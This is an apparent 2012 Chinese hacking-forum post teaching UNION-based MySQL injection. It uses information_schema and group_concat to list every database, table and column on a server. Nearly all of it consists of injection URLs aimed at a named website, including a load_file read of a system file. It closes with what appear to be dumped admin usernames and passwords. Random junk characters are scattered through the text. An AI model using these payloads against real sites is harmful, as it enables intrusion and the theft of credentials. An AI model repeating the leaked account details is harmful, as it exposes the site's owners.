标题: mysql注入高效方法 [打印本页] 作者: admin 时间: 2012-9-13 16:37 标题: mysql注入高效方法 此方法只适用于Mysql 5.0以及5.0以上版本 注入方法和mysql 5 类似 : { ?( @: s6 N! [但此方法大大提高了读取数据库的速度,此方法并非本人原创,原创出处是国外某牛人 8 X/ e% @2 I4 N- o8 Y$ F( K' `$ z& N5 E1 t8 f/ n: P8 Q6 {
& G. J A: R/ o3 {% x
优点在于可以利用information_schema库与group_concat的配合 来达到一次性读取出指定数据库里的内容,并且在limit被限制的情况下依然可以注入 5 s7 w; Q9 N% _1 u . q$ z2 k3 d) F4 V }缺点 当一个库存在几百甚至几千个表和表字段和数据的时候 读取出数据的时间会相当的慢... 6 i7 u0 K. x9 K6 J& Q+ j : e' G9 f* ` h$ ~% |6 U) O9 U8 w下面用简单实例来演示 原理不多说,相信经常玩注入的朋友都知道了.只挑重要部分实例演示- {! f, ?- d7 V' w: v
在注入时根据实际情况作出变化 比如过滤了空格,使用/**/ , + 等等 8 {( R" a, I' ]1 B " a: R3 {/ Z& shttp://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,database(),10,11,12,13,14,15,16,17+ \' P: e6 B! e D! h$ O% k
9 K; W0 k6 H" | C0 B
读出所有库: & Z! U* } Z0 g4 N% {0 khttp://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(schema_name),10,11,12,13,14,15,16,17 from information_schema.SCHEMATA / F/ b# L1 M. ~5 o; ?: P( @ - O3 D7 R% R0 W% B2 T: N0 | n) x( j0 I/ A9 r* a6 \* f$ x! X/ ~ ]6 w
读出所有表:- b- g& J$ l! R http://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(table_name),10,11,12,13,14,15,16,17 from information_schema.tables where table_schema=database() 5 [2 {9 R, {! \: ~! F - O- U( S1 ]* W, |* b! R读出所有表字段:& j1 U$ j) G2 J* q, T6 `9 }4 b http://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(column_name),10,11,12,13,14,15,16,17 from information_schema.COLUMNS where table_schema=database() and table_name=char(97,100,109,105,110)$ f# c7 ] v0 s# ?0 C
*/ (97,100,109,105,110)为admin的ascii码 依次类推, N1 {( J1 z% j: q0 _1 S
8 U1 K+ X( K* w( @读出所有表字段里的内容:2 Q8 A/ K! @! d: D- @) r http://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,group_concat(password),group_concat(admin),10,11,12,13,14,15,16,17 from admin# y2 z9 W. L+ B) z: ]9 D
/ x( k0 M3 H& k
1 b# l. J2 ? E, A1 Q 6 X$ l0 t) O$ H3 S7 T5 C6 Y- K, `0 y$ Y! A0 I2 H+ N
2 C( ]% m/ D/ t 9 P! P' R8 T# {7 yhttp://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),load_file(CHAR(99, 58, 92, 98, 111, 111, 116, 46, 105, 110, 105)),4,5,6,7+%23 $ o" u% ?1 \. O5 o , ~! P, C, J- ^, `7 q5 M" i# b6 y http://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(schema_name),4,5,6,7+from+information_schema.schemata%23 # t8 ? c; ^1 V" @0 R w " M( }, u; L5 ^! A4 whttp://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(column_name),4,5,6,7+from+information_schema.COLUMNS where table_schema=database()+and+table_name=char(97,100,109,105,110)%234 y# n. s* v% Z+ v; N$ l. R
7 B b2 G j5 i& C$ ? |6 q
7 x1 j( d! U9 b8 nhttp://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(admin_name,0x3a,admin_password),4,5,6,7+from+admin%23 & h2 U2 W% T6 z: W1 O0 b$ U2 h% w% {$ [% s# J8 n9 {3 f
! `8 r$ N" F2 L# {1 v- V u
webmaster:dzb521123,simlab:simadmin20043233; @5 j! ?2 k; C' N: W$ Q) q